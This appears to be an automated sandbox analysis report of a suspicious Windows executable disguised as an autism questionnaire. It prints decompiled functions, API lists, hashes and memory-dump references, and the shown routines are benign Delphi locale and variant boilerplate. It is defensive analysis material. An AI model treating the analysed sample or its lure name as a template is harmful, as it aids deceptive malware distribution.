                                                                                              • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                                                              • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                              • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E9C4, Relevance: .2, Instructions: 195COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                              • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                                                              • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                              • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405AE0, Relevance: .0, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                              • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                                              • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                              • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00427874, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00427874() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleW(L"oleaut32.dll");
				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
				 *0x4c1188 = _t46;
				return _t46;
			}






                                                                                              0x00427882
                                                                                              0x00427896
                                                                                              0x004278ac
                                                                                              0x004278c2
                                                                                              0x004278d8
                                                                                              0x004278ee
                                                                                              0x00427904
                                                                                              0x0042791a
                                                                                              0x00427930
                                                                                              0x00427946
                                                                                              0x0042795c
                                                                                              0x00427972
                                                                                              0x00427988
                                                                                              0x0042799e
                                                                                              0x004279b4
                                                                                              0x004279ca
                                                                                              0x004279e0
                                                                                              0x004279f6
                                                                                              0x00427a0c
                                                                                              0x00427a22
                                                                                              0x00427a38
                                                                                              0x00427a4e
                                                                                              0x00427a5e
                                                                                              0x00427a64
                                                                                              0x00427a6b

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                                                • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc
                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                              • API String ID: 1646373207-1918263038
                                                                                              • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                              • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                                              • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                              • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E7CC, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 194threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 82%
                                                                                              			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
				signed int _v8;
				char _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _t32;
				signed int _t53;
				signed int _t56;
				signed int _t71;
				signed int _t78;
				signed int* _t82;
				signed int _t85;
				void* _t93;
				signed int _t94;
				signed int _t95;
				signed int _t98;
				signed int _t99;
				void* _t105;
				intOrPtr _t106;
				signed int _t109;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t131;
				void* _t132;
				signed int _t134;
				void* _t136;
				void* _t137;
				void* _t139;
				void* _t140;
				intOrPtr _t141;
				void* _t142;
				long long _t161;

				_t161 = __fp0;
				_t126 = __edi;
				_t109 = __edx;
				_t139 = _t140;
				_t141 = _t140 + 0xfffffff0;
				_push(__edi);
				_v12 = 0;
				_v8 = __edx;
				_t93 = __eax;
				_push(_t139);
				_push(0x41ea61);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				_t32 =  *0x4ba590; // 0x4bb8f8
				_t144 =  *_t32;
				if( *_t32 == 0) {
					E0040554C(0x1a);
				}
				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
				_push(_t139);
				_push(0x41ea44);
				_push( *[fs:edx]);
				 *[fs:edx] = _t141;
				 *0x4be7dc = 0;
				_push(0);
				E00409C00();
				_t142 = _t141 + 4;
				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
				if(_t127 + 0xfffffffd - 3 >= 0) {
					__eflags = _t127 - 0xffffffffffffffff;
					if(_t127 - 0xffffffffffffffff < 0) {
						 *0x4be7dc = 1;
						_push(1);
						E00409C00();
						_t142 = _t142 + 4;
						E00407E00( *0x4be7e0, L"B.C.");
						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
						_t71 =  *0x4be7e0;
						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
						E0041C1C4(1, 1, 1, __eflags, _t161);
						_v20 = E00405790();
						_v16 = 1;
						asm("fild qword [ebp-0x10]");
						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
						_t78 =  *0x4be7e0;
						__eflags = _t78;
						if(_t78 != 0) {
							_t82 = _t78 - 4;
							__eflags = _t82;
							_t78 =  *_t82;
						}
						_t134 = _t78 - 1;
						__eflags = _t134;
						if(_t134 > 0) {
							_t98 = 1;
							do {
								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
								_t98 = _t98 + 1;
								_t134 = _t134 - 1;
								__eflags = _t134;
							} while (_t134 != 0);
						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
					}
				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
					_t85 =  *0x4be7e0;
					if(_t85 != 0) {
						_t85 =  *(_t85 - 4);
					}
					_t136 = _t85 - 1;
					if(_t136 >= 0) {
						_t137 = _t136 + 1;
						_t99 = 0;
						do {
							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
							_t99 = _t99 + 1;
							_t137 = _t137 - 1;
						} while (_t137 != 0);
					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
				}
				_t94 =  *0x4be7e0;
				if(_t94 != 0) {
					_t94 =  *(_t94 - 4);
				}
				_push(_t94);
				E00409C00();
				_t53 =  *0x4be7e0;
				if(_t53 != 0) {
					_t53 =  *(_t53 - 4);
				}
				_t131 = _t53 - 1;
				if(_t131 >= 0) {
					_t132 = _t131 + 1;
					_t95 = 0;
					do {
						_t127 = _t95 + _t95 * 2;
						_t106 =  *0x416e18; // 0x416e1c
						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
						_t95 = _t95 + 1;
						_t132 = _t132 - 1;
					} while (_t132 != 0);
				}
				_t116 =  *0x41e600; // 0x41e604
				E00409D24(0x4be7e0, _t116);
				_t56 =  *0x4be7e0;
				if(_t56 != 0) {
					_t56 =  *(_t56 - 4);
				}
				 *0x4be7dc = _t56;
				_pop(_t117);
				_pop(_t105);
				 *[fs:eax] = _t117;
				_push(0x41ea4b);
				return E00406868( *0x4be7e4, _t105, _t127);
			}


































                                                                                              0x0041e7cc
                                                                                              0x0041e7cc
                                                                                              0x0041e7cc
                                                                                              0x0041e7cd
                                                                                              0x0041e7cf
                                                                                              0x0041e7d4
                                                                                              0x0041e7d7
                                                                                              0x0041e7da
                                                                                              0x0041e7dd
                                                                                              0x0041e7e1
                                                                                              0x0041e7e2
                                                                                              0x0041e7e7
                                                                                              0x0041e7ea
                                                                                              0x0041e7ed
                                                                                              0x0041e7f2
                                                                                              0x0041e7f5
                                                                                              0x0041e7f9
                                                                                              0x0041e7f9
                                                                                              0x0041e80b
                                                                                              0x0041e812
                                                                                              0x0041e813
                                                                                              0x0041e818
                                                                                              0x0041e81b
                                                                                              0x0041e820
                                                                                              0x0041e826
                                                                                              0x0041e837
                                                                                              0x0041e83c
                                                                                              0x0041e84f
                                                                                              0x0041e861
                                                                                              0x0041e86b
                                                                                              0x0041e8c8
                                                                                              0x0041e8cb
                                                                                              0x0041e8d6
                                                                                              0x0041e8dc
                                                                                              0x0041e8ed
                                                                                              0x0041e8f2
                                                                                              0x0041e8ff
                                                                                              0x0041e90b
                                                                                              0x0041e90e
                                                                                              0x0041e913
                                                                                              0x0041e91a
                                                                                              0x0041e92d
                                                                                              0x0041e937
                                                                                              0x0041e93a
                                                                                              0x0041e93d
                                                                                              0x0041e945
                                                                                              0x0041e948
                                                                                              0x0041e957
                                                                                              0x0041e95c
                                                                                              0x0041e961
                                                                                              0x0041e963
                                                                                              0x0041e965
                                                                                              0x0041e965
                                                                                              0x0041e968
                                                                                              0x0041e968
                                                                                              0x0041e96c
                                                                                              0x0041e96d
                                                                                              0x0041e96f
                                                                                              0x0041e971
                                                                                              0x0041e976
                                                                                              0x0041e97f
                                                                                              0x0041e987
                                                                                              0x0041e988
                                                                                              0x0041e988
                                                                                              0x0041e988
                                                                                              0x0041e976
                                                                                              0x0041e999
                                                                                              0x0041e999
                                                                                              0x0041e86d
                                                                                              0x0041e87b
                                                                                              0x0041e880
                                                                                              0x0041e887
                                                                                              0x0041e88c
                                                                                              0x0041e88c
                                                                                              0x0041e890
                                                                                              0x0041e893
                                                                                              0x0041e895
                                                                                              0x0041e896
                                                                                              0x0041e898
                                                                                              0x0041e8a1
                                                                                              0x0041e8a9
                                                                                              0x0041e8aa
                                                                                              0x0041e8aa
                                                                                              0x0041e898
                                                                                              0x0041e8bb
                                                                                              0x0041e8bb
                                                                                              0x0041e9a3
                                                                                              0x0041e9a7
                                                                                              0x0041e9ac
                                                                                              0x0041e9ac
                                                                                              0x0041e9ae
                                                                                              0x0041e9c2
                                                                                              0x0041e9ca
                                                                                              0x0041e9d1
                                                                                              0x0041e9d6
                                                                                              0x0041e9d6
                                                                                              0x0041e9da
                                                                                              0x0041e9dd
                                                                                              0x0041e9df
                                                                                              0x0041e9e0
                                                                                              0x0041e9e2
                                                                                              0x0041e9e2
                                                                                              0x0041e9fa
                                                                                              0x0041ea00
                                                                                              0x0041ea05
                                                                                              0x0041ea06
                                                                                              0x0041ea06
                                                                                              0x0041e9e2
                                                                                              0x0041ea0e
                                                                                              0x0041ea14
                                                                                              0x0041ea19
                                                                                              0x0041ea20
                                                                                              0x0041ea25
                                                                                              0x0041ea25
                                                                                              0x0041ea27
                                                                                              0x0041ea2e
                                                                                              0x0041ea30
                                                                                              0x0041ea31
                                                                                              0x0041ea34
                                                                                              0x0041ea43

                                                                                              APIs
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                                              • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                                              • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CalendarEnumInfoLocaleThread
                                                                                              • String ID: B.C.$ToA$K$K$K
                                                                                              • API String ID: 683597275-1724967715
                                                                                              • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                              • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                                              • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                              • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                                                              0x0040a255
                                                                                              0x0040a25a
                                                                                              0x0040a268
                                                                                              0x0040a270
                                                                                              0x0040a27e
                                                                                              0x0040a295
                                                                                              0x0040a2af
                                                                                              0x0040a2c4
                                                                                              0x0040a2c9
                                                                                              0x00000000
                                                                                              0x0040a2c9
                                                                                              0x0040a2ce

                                                                                              APIs
                                                                                              • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                              • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                              • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                              • API String ID: 74573329-1403180336
                                                                                              • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                              • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                                              • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                              • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                                                              0x0041e0ac
                                                                                              0x0041e0ac
                                                                                              0x0041e0ad
                                                                                              0x0041e0af
                                                                                              0x0041e0b4
                                                                                              0x0041e0b4
                                                                                              0x0041e0b6
                                                                                              0x0041e0b8
                                                                                              0x0041e0b8
                                                                                              0x0041e0bd
                                                                                              0x0041e0be
                                                                                              0x0041e0c0
                                                                                              0x0041e0c4
                                                                                              0x0041e0c5
                                                                                              0x0041e0ca
                                                                                              0x0041e0cd
                                                                                              0x0041e0d3
                                                                                              0x0041e0d8
                                                                                              0x0041e0da
                                                                                              0x0041e0e1
                                                                                              0x0041e0e1
                                                                                              0x0041e0e9
                                                                                              0x0041e0ef
                                                                                              0x0041e0f8
                                                                                              0x0041e101
                                                                                              0x0041e10a
                                                                                              0x0041e11c
                                                                                              0x0041e126
                                                                                              0x0041e13b
                                                                                              0x0041e14a
                                                                                              0x0041e15d
                                                                                              0x0041e16c
                                                                                              0x0041e182
                                                                                              0x0041e199
                                                                                              0x0041e1b0
                                                                                              0x0041e1bf
                                                                                              0x0041e1d2
                                                                                              0x0041e1d4
                                                                                              0x0041e1d8
                                                                                              0x0041e1e9
                                                                                              0x0041e1f4
                                                                                              0x0041e1fd
                                                                                              0x0041e20e
                                                                                              0x0041e219
                                                                                              0x0041e22e
                                                                                              0x0041e242
                                                                                              0x0041e24d
                                                                                              0x0041e262
                                                                                              0x0041e26d
                                                                                              0x0041e275
                                                                                              0x0041e27d
                                                                                              0x0041e292
                                                                                              0x0041e29c
                                                                                              0x0041e2a1
                                                                                              0x0041e2a3
                                                                                              0x0041e2bc
                                                                                              0x0041e2a5
                                                                                              0x0041e2ad
                                                                                              0x0041e2ad
                                                                                              0x0041e2d1
                                                                                              0x0041e2db
                                                                                              0x0041e2e0
                                                                                              0x0041e2e2
                                                                                              0x0041e2f4
                                                                                              0x0041e305
                                                                                              0x0041e31e
                                                                                              0x0041e307
                                                                                              0x0041e30f
                                                                                              0x0041e30f
                                                                                              0x0041e305
                                                                                              0x0041e323
                                                                                              0x0041e326
                                                                                              0x0041e329
                                                                                              0x0041e32e
                                                                                              0x0041e339
                                                                                              0x0041e33e
                                                                                              0x0041e341
                                                                                              0x0041e344
                                                                                              0x0041e349
                                                                                              0x0041e354
                                                                                              0x0041e369
                                                                                              0x0041e36d
                                                                                              0x0041e378
                                                                                              0x0041e37b
                                                                                              0x0041e37e
                                                                                              0x0041e390

                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                                              • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                                                • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                                • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                              Strings
                                                                                              Memory Dump Source
